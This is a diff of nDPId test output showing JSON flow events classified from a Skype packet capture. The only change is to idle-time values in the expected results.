-00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969681060,"flow_last_seen":1431969700978,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":454,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969681060,"flow_last_seen":1431969700978,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":454,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50066,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969681060,"flow_last_seen":1431969700978,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":454,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969681060,"flow_last_seen":1431969700978,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":454,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50066,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -1290,7 +1280,7 @@ 00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.62.0.85","src_port":13021,"dst_port":33647,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.168","src_port":13021,"dst_port":40007,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1431969717899,"flow_last_seen":1431969784849,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":1085,"flow_avg_l4_payload_len":90,"midstream":1,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"17.143.160.22","dst_ip":"192.168.1.34","src_port":5223,"dst_port":49447,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1431969717899,"flow_last_seen":1431969784849,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":1085,"flow_avg_l4_payload_len":90,"midstream":1,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"17.143.160.22","dst_ip":"192.168.1.34","src_port":5223,"dst_port":49447,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} 00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.32","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -1311,12 +1301,12 @@ 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.29","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.15","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969750597,"flow_last_seen":1431969791165,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":916,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.47","src_port":50134,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969750597,"flow_last_seen":1431969791165,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":916,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.47","src_port":50134,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969750597,"flow_last_seen":1431969791165,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":916,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.47","src_port":50134,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969750597,"flow_last_seen":1431969791165,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":916,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.47","src_port":50134,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969706277,"flow_last_seen":1431969717910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":458,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":50102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969706277,"flow_last_seen":1431969717910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":458,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":50102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969706277,"flow_last_seen":1431969717910,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":458,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":50102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969706277,"flow_last_seen":1431969717910,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":458,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":50102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -1325,63 +1315,73 @@ 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.44","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969791166,"flow_last_seen":1431969802183,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50145,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969791166,"flow_last_seen":1431969802183,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50145,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969675055,"flow_last_seen":1431969696024,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":261,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50056,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969675055,"flow_last_seen":1431969696024,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":261,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50056,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969675055,"flow_last_seen":1431969694153,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":351,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50057,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969675055,"flow_last_seen":1431969694153,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":351,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50057,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969714398,"flow_last_seen":1431969731992,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50114,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969714398,"flow_last_seen":1431969731992,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50114,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
